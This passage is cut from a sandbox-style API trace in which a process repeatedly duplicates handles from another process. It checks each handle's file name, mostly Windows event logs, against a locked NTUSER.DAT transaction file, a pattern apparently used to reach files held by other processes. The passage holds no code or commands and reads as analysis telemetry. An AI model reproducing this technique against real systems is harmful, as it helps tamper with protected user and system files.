bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.764] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.765] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.765] CloseHandle (hObject=0x1e4) returned 1 [0165.765] _wcsicmp (_Str1="\\Windows PowerShell.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0165.765] CloseHandle (hObject=0x194) returned 1 [0165.765] CloseHandle (hObject=0x1e8) returned 1 [0165.765] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.765] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x214, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.765] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.766] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.767] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.767] CloseHandle (hObject=0x1e4) returned 1 [0165.767] _wcsicmp (_Str1="\\OAlerts.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 1 [0165.767] CloseHandle (hObject=0x194) returned 1 [0165.767] CloseHandle (hObject=0x1e8) returned 1 [0165.767] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.767] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x218, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.768] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.769] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.769] CloseHandle (hObject=0x1e4) returned 1 [0165.769] _wcsicmp (_Str1="\\Media Center.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.769] CloseHandle (hObject=0x194) returned 1 [0165.769] CloseHandle (hObject=0x1e8) returned 1 [0165.769] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.769] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.769] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.770] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.771] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.771] CloseHandle (hObject=0x1e4) returned 1 [0165.771] _wcsicmp (_Str1="\\Key Management Service.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0165.771] CloseHandle (hObject=0x194) returned 1 [0165.771] CloseHandle (hObject=0x1e8) returned 1 [0165.771] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.771] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x224, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.771] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.772] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.773] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.773] CloseHandle (hObject=0x1e4) returned 1 [0165.773] _wcsicmp (_Str1="\\HardwareEvents.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -6 [0165.773] CloseHandle (hObject=0x194) returned 1 [0165.773] CloseHandle (hObject=0x1e8) returned 1 [0165.773] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.773] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.774] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.775] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.775] CloseHandle (hObject=0x1e4) returned 1 [0165.775] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.775] CloseHandle (hObject=0x194) returned 1 [0165.775] CloseHandle (hObject=0x1e8) returned 1 [0165.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.775] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.776] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.777] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.777] CloseHandle (hObject=0x1e4) returned 1 [0165.777] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.777] CloseHandle (hObject=0x194) returned 1 [0165.777] CloseHandle (hObject=0x1e8) returned 1 [0165.777] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.777] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.778] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.779] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.779] CloseHandle (hObject=0x1e4) returned 1 [0165.779] CloseHandle (hObject=0x194) returned 1 [0165.779] CloseHandle (hObject=0x1e8) returned 1 [0165.779] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.779] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.779] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.779] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.780] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.780] CloseHandle (hObject=0x1e4) returned 1 [0165.780] CloseHandle (hObject=0x194) returned 1 [0165.780] CloseHandle (hObject=0x1e8) returned 1 [0165.780] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.780] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x314, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.781] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.782] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.782] CloseHandle (hObject=0x1e4) returned 1 [0165.782] CloseHandle (hObject=0x194) returned 1 [0165.782] CloseHandle (hObject=0x1e8) returned 1 [0165.782] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.782] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x318, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.783] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.784] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.784] CloseHandle (hObject=0x1e4) returned 1 [0165.784] CloseHandle (hObject=0x194) returned 1 [0165.784] CloseHandle (hObject=0x1e8) returned 1 [0165.784] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.784] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.785] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.785] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.785] CloseHandle (hObject=0x1e4) returned 1 [0165.785] CloseHandle (hObject=0x194) returned 1 [0165.786] CloseHandle (hObject=0x1e8) returned 1 [0165.786] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.786] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.786] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.787] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.787] CloseHandle (hObject=0x1e4) returned 1 [0165.787] CloseHandle (hObject=0x194) returned 1 [0165.787] CloseHandle (hObject=0x1e8) returned 1 [0165.788] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.788] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.788] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.789] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.789] CloseHandle (hObject=0x1e4) returned 1 [0165.789] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.789] CloseHandle (hObject=0x194) returned 1 [0165.789] CloseHandle (hObject=0x1e8) returned 1 [0165.789] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.789] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.790] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.791] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.791] CloseHandle (hObject=0x1e4) returned 1 [0165.791] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.791] CloseHandle (hObject=0x194) returned 1 [0165.791] CloseHandle (hObject=0x1e8) returned 1 [0165.791] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.791] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.791] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.792] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.793] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.793] CloseHandle (hObject=0x1e4) returned 1 [0165.793] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.793] CloseHandle (hObject=0x194) returned 1 [0165.793] CloseHandle (hObject=0x1e8) returned 1 [0165.793] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.793] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.794] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.795] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.795] CloseHandle (hObject=0x1e4) returned 1 [0165.795] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.795] CloseHandle (hObject=0x194) returned 1 [0165.795] CloseHandle (hObject=0x1e8) returned 1 [0165.795] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.795] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.795] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.796] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.797] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.797] CloseHandle (hObject=0x1e4) returned 1 [0165.797] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.797] CloseHandle (hObject=0x194) returned 1 [0165.797] CloseHandle (hObject=0x1e8) returned 1 [0165.797] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.797] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.797] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.798] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.799] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.799] CloseHandle (hObject=0x1e4) returned 1 [0165.799] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.799] CloseHandle (hObject=0x194) returned 1 [0165.799] CloseHandle (hObject=0x1e8) returned 1 [0165.800] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.800] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.800] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.801] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.801] CloseHandle (hObject=0x1e4) returned 1 [0165.801] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.802] CloseHandle (hObject=0x194) returned 1 [0165.802] CloseHandle (hObject=0x1e8) returned 1 [0165.802] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.802] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.802] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.803] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.806] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.806] CloseHandle (hObject=0x1e4) returned 1 [0165.806] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.806] CloseHandle (hObject=0x194) returned 1 [0165.806] CloseHandle (hObject=0x1e8) returned 1 [0165.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.807] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.807] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.813] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.813] CloseHandle (hObject=0x1e4) returned 1 [0165.813] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.813] CloseHandle (hObject=0x194) returned 1 [0165.813] CloseHandle (hObject=0x1e8) returned 1 [0165.813] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.813] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.813] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.814] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.815] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.815] CloseHandle (hObject=0x1e4) returned 1 [0165.815] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.815] CloseHandle (hObject=0x194) returned 1 [0165.815] CloseHandle (hObject=0x1e8) returned 1 [0165.815] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.815] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.815] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.816] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.817] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.817] CloseHandle (hObject=0x1e4) returned 1 [0165.817] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.817] CloseHandle (hObject=0x194) returned 1 [0165.817] CloseHandle (hObject=0x1e8) returned 1 [0165.817] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.817] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.818] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.819] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.819] CloseHandle (hObject=0x1e4) returned 1 [0165.819] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.819] CloseHandle (hObject=0x194) returned 1 [0165.819] CloseHandle (hObject=0x1e8) returned 1 [0165.819] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.819] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, 